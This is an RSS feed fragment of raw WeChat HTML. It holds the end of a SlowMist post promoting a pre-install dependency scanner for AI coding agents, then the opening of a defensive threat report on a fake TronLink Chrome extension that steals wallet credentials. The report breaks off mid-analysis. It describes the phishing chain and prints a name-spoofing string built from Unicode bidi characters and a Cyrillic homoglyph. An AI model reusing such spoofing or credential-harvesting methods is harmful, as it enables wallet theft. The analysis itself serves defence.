51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">个人开发者</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">不用自己判断每个依赖是否安全，MistEye 自动帮你看</span></span></p></td></tr><tr><td data-colwidth="166"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">开发团队</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">统一 AI 编码代理的安全基线，所有依赖安装经过同一检测标准</span></span></p></td></tr><tr><td data-colwidth="166"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">安全研究</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">作</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">为依赖投毒、恶意 Skill 等供应链安全的检测工具</span></span></p></td></tr><tr><td data-colwidth="166"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">企业级部署</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">每日巡检实现 AI 代理依赖的持续安全运营</span></span></p></td></tr></tbody></table><h2 dir="ltr" style="line-height: 1.38;margin-top: 18pt;margin-bottom: 4pt;"><b data-pm-slice="0 0 []"><span leaf="" style="white-space: pre-wrap;font-size: 17pt;font-family: Arial, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;">八、结语</span></span></b></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">MistEye Security Gate 是慢雾安全团队面向 AI 代理时代推出的实用安全工具。它不追求大而全的框架叙事，而是聚焦于</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">依赖安装前的安全检查</span><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">这一高频、高风险的单一场景，用严格的硬阻断逻辑和全量覆盖率门限，为 AI 代理的依赖安全提供可靠的前置防线。</span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在当前 AI 编码工具和 Skill 生态持续扩张的背景下，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在安装任何东西之前先做一次安全检测</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，是每一位开发者都值得养成的习惯。</span></span></b></p></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504886&amp;idx=1&amp;sn=6327c2cd38ad036a84e468f938309eb4&amp;scene=21#wechat_redirect" textvalue="慢雾｜RWA 智能合约安全审计服务正式推出" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾｜RWA 智能合约安全审计服务正式推出</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504881&amp;idx=1&amp;sn=8c83bc9f82e684fdb75e04fade95913f&amp;scene=21#wechat_redirect" textvalue="Grok 被利用背后：AI Agent 权限链滥用分析" data-itemshowtype="0" linktype="text" data-linktype="2">Grok 被利用背后：AI Agent 权限链滥用分析</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504861&amp;idx=1&amp;sn=0f71a6b7fafe17ee9cd5e6cf07b83e41&amp;scene=21#wechat_redirect" textvalue="慢雾出品｜链接真实世界资产：从协议族解析到安全实践" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾出品｜链接真实世界资产：从协议族解析到安全实践</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504841&amp;idx=1&amp;sn=289fc7c20f2f00f8313ea5a5c378f90f&amp;scene=21#wechat_redirect" textvalue="慢雾 2026 香港 Web3 嘉年华之旅圆满收官!" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾 2026 香港 Web3 嘉年华之旅圆满收官!</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504768&amp;idx=1&amp;sn=4589da9b7bea88de8f7b4dbd5cbfd0c8&amp;scene=21#wechat_redirect" textvalue="Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式" data-itemshowtype="0" linktype="text" data-linktype="2">Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" data-ratio="3.9814814814814814" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6cd34707&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504920%26idx%3D1%26sn%3D6452ec12fb825b3a0b91ca5be8f009d8">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 09 May 2026 18:46:00 +0800</pubDate>
    </item>
    <item>
      <title>威胁情报｜仿冒 TronLink 的 Chrome 扩展钓鱼攻击分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504920&amp;idx=2&amp;sn=476c39eb63c7323cc18604a3ccc5d487</link>
      <description>本次攻击通过仿冒 Chrome 扩展与远程钓鱼页面构建双层攻击链，实现钱包凭据窃取，并结合反分析、地域分流等手段展现出成熟的钓鱼攻击工程化能力。</description>
      <content:encoded><![CDATA[<p>原创 <span>慢雾安全团队</span> <span>2026-05-09 18:46</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=218bec62&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCKMC4zFRXkQ8rCXMZSTP3IwvQEnDZtumyRRuTAv3RalCU5G3ANh9pR9hC41pOmdbnFZtTreIlDjVZ4vcylXicgS5QpUBVfQ8NQI%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>本次攻击通过仿冒 Chrome 扩展与远程钓鱼页面构建双层攻击链，实现钱包凭据窃取，并结合反分析、地域分流等手段展现出成熟的钓鱼攻击工程化能力。</p>
  <p><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">背景</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">近日，慢雾 MistEye 安全监控系统捕获到一个针对 TRON 钱包用户的高风险钓鱼攻击样本。该样本伪装为与 TRON 钱包生态相关的 Chrome MV3 (Manifest V3) 扩展，通过品牌冒充与远程可变 UI 装载相结合的方式，构建了一条完整的钱包凭据窃取链。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">攻击手法分为两层：第一层是一个仿冒 TronLink 的 Chrome 扩展，利用 Unicode 方向控制字符和西里尔同形字伪装品牌名称，在用户安装后优先加载远程 iframe 作为 popup 界面；第二层是远程钓鱼页面，该页面完整仿造了 TronLink Wallet 网页钱包的 UI 和功能，在用户无感知的情况下收集助记词、私钥、keystore 文件及密码，并通过同源 API 和 Telegram Bot 外传。静态扩展包审查难以覆盖远程 iframe 的后续界面行为，特此发布分析报告供社区防御和自查。</span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">MistEye 响应</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye 是由 SlowMist 自主研发的 Web3 威胁情报与动态安全监控系统，集成了安全监控与情报聚合能力，为用户提供实时的风险预警与资产守护。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在捕获本次仿冒 TronLink 的 Chrome 扩展及其关联远程钓鱼页面后，MistEye 系统已触发高危告警并推送客户。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9148148148148149" data-type="png" data-w="1080" height="551" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021252" src="https://wechat2rss.xlab.app/img-proxy/?k=7fcf8253&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJUud86iaQeRHEUwiay4iaa9VmLs2AzKunuic06cNmBPhkaHbopjr0Rfib5vVebfNYl3kxNKFeG4LLmcrAyDxgEXibiaka4amSzxW3UaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">(<a href="https://enterprise.misteye.io/threat-intelligence/SM-2026-211873)" target="_blank">https://enterprise.misteye.io/threat-intelligence/SM-2026-211873)</a></span></span></p></b></b></b></b></p><p><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">恶意扩展分析</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">该样本为 Chrome MV3 扩展，扩展包结构伪装为合法的区块链查询工具。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">品牌伪装与防御规避</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">扩展的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">manifest.json</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 通过 Chrome 国际化机制将扩展名称和标题指向 locale 消息文件。在 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">_locales/en/messages.json</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 中，攻击者使用了 Unicode 双向控制字符和西里尔同形字构造字符串 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">T\u202Enor\u202CL\u0456\u202Ekn</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，使浏览器展示层与官方 TronLink 品牌高度相似，属于面向钱包用户的欺骗性分发行为。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.19537037037037036" data-type="png" data-w="1080" height="117" style="margin-left: 